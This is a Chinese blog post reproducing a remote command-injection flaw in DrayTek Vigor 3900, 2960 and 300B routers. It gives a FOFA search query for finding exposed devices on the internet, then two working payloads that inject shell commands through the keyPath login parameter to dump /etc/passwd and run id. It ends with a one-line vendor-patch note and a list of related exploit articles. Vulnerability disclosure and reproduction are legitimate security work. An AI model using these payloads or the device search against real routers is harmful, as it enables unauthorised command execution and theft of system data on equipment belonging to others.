DrayTek Vigor 路由器远程命令执行漏洞复现(CNVD-2022-31821)

最新推荐文章于 2024-04-02 10:41:25 发布
最新推荐文章于 2024-04-02 10:41:25 发布
阅读量777 收藏 3
点赞数 7
分类专栏: 漏洞复现篇 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42181573/article/details/135839915
版权

文章目录

一、漏洞描述

DrayTek Vigor是一种路由器。
DrayTek Vigor中存在一个远程命令注入漏洞,攻击者可利用该漏洞通过在mainfunction.cgi中包含格式错误的查询字符串的精心编制的HTTP消息,让远程恶意用户执行任意代码。

二、影响版本

DrayTek Vigor3900 1.5.1.3
DrayTek Vigor2960 1.5.1.3
DrayTek Vigor300B 1.5.1.3

三、环境搭建

FOFA规则:title=”Vigor 2960”
在这里插入图片描述

三、漏洞复现

执行payload:

action=login&keyPath=%27%0A%2fbin%2fcat${IFS}/etc/passwd%26ls%0A%27&loginUser=a&loginPwd=a

在这里插入图片描述
执行payload:

action=login&keyPath=%27%0Aid%0A%27&loginUser=a&loginPwd=a

在这里插入图片描述

四、修复建议

厂商已发布了漏洞修复程序,请及时关注更新:https://www.draytek.com/

Li-D
关注
  • 7
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DrayTek Vigor AP910C 路由器后台RCE漏洞复现
0xSec
12-12 788
DrayTekVigorAP910C存在后台RCE漏洞。攻击者可通过该漏洞在设备任意执行代码写入后门,获取设备权限,进而控制整个设备。
draytek-vigor-2960 远程命令执行
weixin_43567873的博客
03-08 123
draytek-vigor-2960 远程命令执行
29款DrayTek 路由器受严重RCE漏洞影响
smellycat000的专栏
08-05 1238
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Trellix 公司的安全研究员发现一个严重的远程代码执行 (RCE)漏洞 (CVE-2022-32548),影响29款 DrayTek Vigor 系列企业路由器。该漏洞过的CVSS v3 评分为10分,为‘’严重”级别。无需凭据或用户交互,默认的设备配置即可使攻击者通过互联网和LAN利用该漏洞实施攻击。利用该漏洞的黑...
Draytek企业网络设备命令注入复现(CVE-2020-8515)
thelostworld
04-10 1244
一、漏洞描述DrayTek URI未能正确处理SHELL字符,远程攻击者可以利用该漏洞提交特殊的请求,可以ROOT权限执行任意命令远程命令注入漏洞被标记为CVE-2020-8515,主要影响了DrayTek Vigor网络设备,包括企业交换机、路由器、负载均衡器和VPN网关。二、影响范围Vigor2960 < v1.5.1Vigor300B < v1.5.1Vigor3900 &lt...
最新0day!!用友U8-Cloud UploadFile接口存在任意文件读取漏洞
最新发布
weixin_43167326的博客
04-02 589
U8 cloud 聚焦成长型、创新型企业的云 ERP,基于全新的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实现企业互联网资源连接、共享、协同。该系统存在任何文件读取漏洞
攻击者正利用DrayTek路由器0day漏洞修改DNS设置
weixin_33882452的博客
05-21 894
DrayTek是一家台湾宽带CPE(客户端设备)制造商,其生产的设备主要包括路由器、交换机、防火墙以及VPN设备等。5月18日,该公司宣布称,黑客正在利用其DrayTek路由器中存在的0day漏洞,来更改部分路由器的DNS设置。 就在多位DrayTek路由器用户在Twitter上报告称,发现了DrayTek路由器的DNS设置已经更改,并指向位于3...
draytek路由器设置
01-15
draytek路由器设置
PHP文件包含漏洞(利用phpinfo)
Li-D的博客
12-31 8507
漏洞描述 文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 PHP中引发文件包含漏洞的通常是以下四个函数: 1、include()当使用该函数包含文件时,只有代码执行到include()函数时才将文件包含进来,发生错误时只给出一个警告,继续向下执行。 2、include_once()功能和include()相同,区别在于当重复调用同一文件时,程序只调用一次。 3、require()只要程序一执行
Tomcat代码执行漏洞(CVE-2017-12615)
Li-D的博客
08-30 7337
漏洞描述 2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,其中 远程代码执行漏洞(CVE-2017-12615) 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。 影响版
Weblogic Console远程代码执行漏洞(CVE-2020-14882)
Li-D的博客
06-04 6825
漏洞描述 2020年10月30日, Oracle 官方的 CVE-2020-14882 Weblogic 代码执行漏洞最新补丁可被绕过,该漏洞编号为 CVE-2020-14882。远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic ServerConsole 执行任意代码。 影响版本 Oracle WeblogicServer 10.3.6.0.0 Oracle WeblogicServer 12.1.3.0
Tomcat 幽灵猫任意文件读取漏洞(CVE-2020-1938)
Li-D的博客
09-16 3509
漏洞描述 Tomcat服务器是一个免费的开放源代码的Web应用服务器,属于轻量级应用服务器。Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件。 漏洞影响版本 Apache Tomcat 6 Apache Tomcat 7 < 7.0.100 Apache Tomcat 8 < 8.5.51 Apache Tomcat 9 < 9.0.31 漏洞危害 攻击者可利用该漏洞进行任意文
Apache Flink RCE漏洞复现(任意 Jar 包上传)
Li-D的博客
08-31 3181
漏洞描述 Apache Flink Dashboard 默认无需认证即可访问,攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的。 影响版本 Apache Flink <= 1.9.1 环境搭建 操作系统: Windows10 操作环境: Apache flink 漏洞版本: Apache flink 1.9.1 搭建过程: (1)下载flink (https://archive.apache.org/dist/flink/flink-1.9.
Ubuntu特权提升漏洞(CVE-2021-3493)
Li-D的博客
04-25 3078
漏洞描述 OverlayFS漏洞允许Ubuntu下的本地用户获得root权限。Linux内核中overlayfs文件系统中的Ubuntu特定问题,在该问题中,它未正确验证关于用户名称空间的文件系统功能的应用程序。由于Ubuntu附带了一个允许非特权的overlayfs挂载的补丁,因此本地攻击者可以使用它来获得更高的特权。 影响版本 Ubuntu 20.10 Ubuntu 20.04 LTS Ubuntu 18.04 LTS Ubuntu 16.04 LTS Ubuntu 14.04 ESM
Apache SSI 远程命令执行漏洞
Li-D的博客
12-31 2780
漏洞描述 当目标服务器开启了SSI与CGI支持,我们就可以上传shtml,利用<!--#exec cmd=“id” -->语法执行命令。 使用SSI(Server Side Include)的html文件扩展名,SSI(Server Side Include),通常称为"服务器端嵌入"或者叫"服务器端包含",是一种类似于ASP的基于服务器的网页制作技术。默认扩展名是 .stm、.shtm 和 .shtml。 漏洞危害 攻击者可以利用此问题进行任意命令执行操作。这可能有助于进一步的攻击。 漏洞影响
Spring Cloud Config目录遍历漏洞(CVE-2019-3799)
Li-D的博客
09-16 2410
漏洞描述 Spring Cloud Config目录遍历漏洞的本质是允许应用程序通过spring-cloud-config-server模块获取任意配置文件。攻击者可以构建恶意URL以利用目录遍历漏洞漏洞危害 由于spring-cloud-config-server模块未对传入路径进行安全限制,攻击者可以利用多个…%252f进行目录遍历,查看服务器其他路径的敏感文件,造成敏感信息泄露。 漏洞影响版本 Spring Cloud Config 2.1.0 to 2.1.1 Spring Cloud Conf
CVE-2021-44228——Log4j2-RCE漏洞复现
Li-D的博客
06-10 1784
Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞
Spring MVC的RFD-反射文件下载(cve-2020-5398)
Li-D的博客
09-16 1607
漏洞描述 Spring MVC的RFD(反射型文件下载漏洞)为攻击客户端的漏洞,当响应中设置了“Content-Disposition”头且filename属性是用户可控时容易受到RFD攻击。 攻击应满足以下所有条件才可成功: 1、响应header是通过org.springframework.http.ContentDisposition进行添加的; 2、文件名是通过以下方式之一设置的: ContentDisposition.Builder#filename(String) ContentDispositi
Jira未授权SSRF漏洞(CVE-2019-8451)
Li-D的博客
12-31 1473
漏洞描述 Jira的/plugins/servlet/gadgets/makeRequest资源存在SSRF漏洞,原因在于JiraWhitelist这个类的逻辑缺陷,成功利用此漏洞远程攻击者可以以Jira服务端的身份访问内网资源。经分析,此漏洞无需任何凭据即可触发。 漏洞危害 远程攻击者可以利用此漏洞以Jira服务端的身份访问内网资源。 漏洞影响版本 Jira < 8.4.0 漏洞分析 两个关键信息点: • 漏洞点在/plugins/servlet/gadgets/makeRequest • 原因在
Apache Unomi远程代码执行漏洞(CVE-2020-13942)
Li-D的博客
06-04 892
漏洞描述 Apache Unomi是一个Java开源客户数据平台,这是一个Java服务器,旨在管理客户,潜在顾客和访问者的数据,并帮助个性化客户体验。Unomi可用于在非常不同的系统(例如CMS,CRM,问题跟踪器,本机移动应用程序等)中集成个性化和配置文件管理。 在Apache Unomi 1.5.1版本之前,存在一处表达式注入漏洞,攻击者可以通过精心构造的MVEL或ONGl表达式来发送恶意请求,使得Unomi服务器执行任意代码,攻击者绕过补丁检测的黑名单,发送恶意请求,在服务器执行任意代码。 漏洞
useradd -m -d
09-22
useradd -m -d是一个Linux系统中创建用户的命令,其中-m表示同时创建用户的主目录,-d后面跟着指定的目录路径,表示指定用户主目录的位置。这个命令还可以使用其他选项,比如-g指定用户所属的主组,-G指定用户所属的附加组,-s指定用户的登录Shell等等。这个命令还可以结合其他命令一起使用,比如passwd命令可以用于修改用户的密码,userdel命令可以用于删除用户账号。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值